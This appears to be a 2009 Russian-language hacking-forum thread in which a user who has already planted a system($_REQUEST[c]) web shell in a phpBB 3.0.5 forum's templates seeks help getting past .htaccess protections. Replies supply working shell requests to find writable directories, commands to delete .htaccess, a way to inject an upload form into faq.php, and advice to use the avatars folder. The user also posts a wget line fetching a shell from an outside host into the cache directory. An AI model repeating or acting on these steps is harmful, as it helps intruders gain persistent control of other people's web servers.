HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите с phpBB 3.0.5
  #1  
Старый 14.08.2009, 22:02
BloodKicker
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559

Репутация: 0
По умолчанию Помогите с phpBB 3.0.5

Кто может расписать как залить шелл на форум phpBB версии 3,0,5. директория chache и store под .httaccses
 
Ответить с цитированием

  #2  
Старый 14.08.2009, 23:06
Stinside
Участник форума
Регистрация: 01.05.2009
Сообщений: 212
Провел на форуме:
362450

Репутация: 76
Отправить сообщение для Stinside с помощью ICQ Отправить сообщение для Stinside с помощью AIM Отправить сообщение для Stinside с помощью Yahoo
По умолчанию

Не думаю, что кто-то возьмется за это.
Это же звездец мне кажется геморрой.
 
Ответить с цитированием

  #3  
Старый 14.08.2009, 23:15
BloodKicker
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559

Репутация: 0
По умолчанию

Шелл есть в темплейтах
system($_REQUEST[c])
просто я не знаю куда еще шелл залить.
ПС доступ к админке пока тоже есть
 
Ответить с цитированием

  #4  
Старый 15.08.2009, 16:09
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

сделай такой запрос - покажет все возможные папки на запись:

&c=system('cd ../; find . -perm -2 -type d -ls');

тьфу, у тебя там уже систем, тогда так:

?c=cd%20../;%20find%20.%20-perm%20-2%20-type%20d%20-ls

Последний раз редактировалось Pashkela; 15.08.2009 в 16:16..
 
Ответить с цитированием

  #5  
Старый 16.08.2009, 14:45
BloodKicker
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559

Репутация: 0
По умолчанию

я уже делал но эта злая собака .httaccses мешается( везде
 
Ответить с цитированием

  #6  
Старый 16.08.2009, 15:23
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

т.е. во всех папках с правами на запись есть .htaccess, запрещающий выполнение php-кода?

хз, можно попробовать отредактировать файлы в корне форума, откуда уж php точно выполняется. Если прав хватит. Просто вставить форму загрузки например в faq.php посредством определенного php-кода через твой шелл в темплейте. Опять же если правов хватает

Последний раз редактировалось Pashkela; 16.08.2009 в 15:27..
 
Ответить с цитированием

  #7  
Старый 16.08.2009, 16:25
BloodKicker
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559

Репутация: 0
По умолчанию

а можно подробней, как же отредактировать тот же faq.php через шелл? Если такое возможно то может просто через запрос удалить аксес, а дальше по средствам wget'а заливать шелл
 
Ответить с цитированием

  #8  
Старый 16.08.2009, 16:28
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

ну дык и удаляй .htaccess, чо ты думаешь

unlink('/абсолютный_путь_до_папки/.htaccess'); - через php
rm /абсолютный_путь_до_папки/.htaccess - через system

опять же если хватит прав
 
Ответить с цитированием

  #9  
Старый 16.08.2009, 16:50
BloodKicker
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559

Репутация: 0
По умолчанию

непрактило, может еще есть способы залить в эту сраку шелл?
И проверьте правильно ли я вообще запрос wget'a кидаю
Цитата:
wget%20-O%20http://kicker-xxx.narod.ru/shell.txt%20/var/www/forum/cache/1.php
 
Ответить с цитированием

  #10  
Старый 16.08.2009, 18:03
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

причем здесь кеш вообще? А что, папку с авами отменили? Зайди на любую тему в форуме и посмотри свойства авы любого участника - туда и лей, и никаких вгетов, для начала хоть phpinfo.php туда запиши. А то шелл не залил еще, а свой сайт с шеллом уже в логах оставил
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Уязвимости CMS / форумов 21 13.01.2007 23:01
Помогите залить шелл на phpBB 2.0.21 ! XXL Разное - Покупка, продажа, обмен 3 19.07.2006 12:22
Помогите правильно настроить phpBB 2.0.18. pcVirus Уязвимости CMS / форумов 8 18.12.2005 15:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ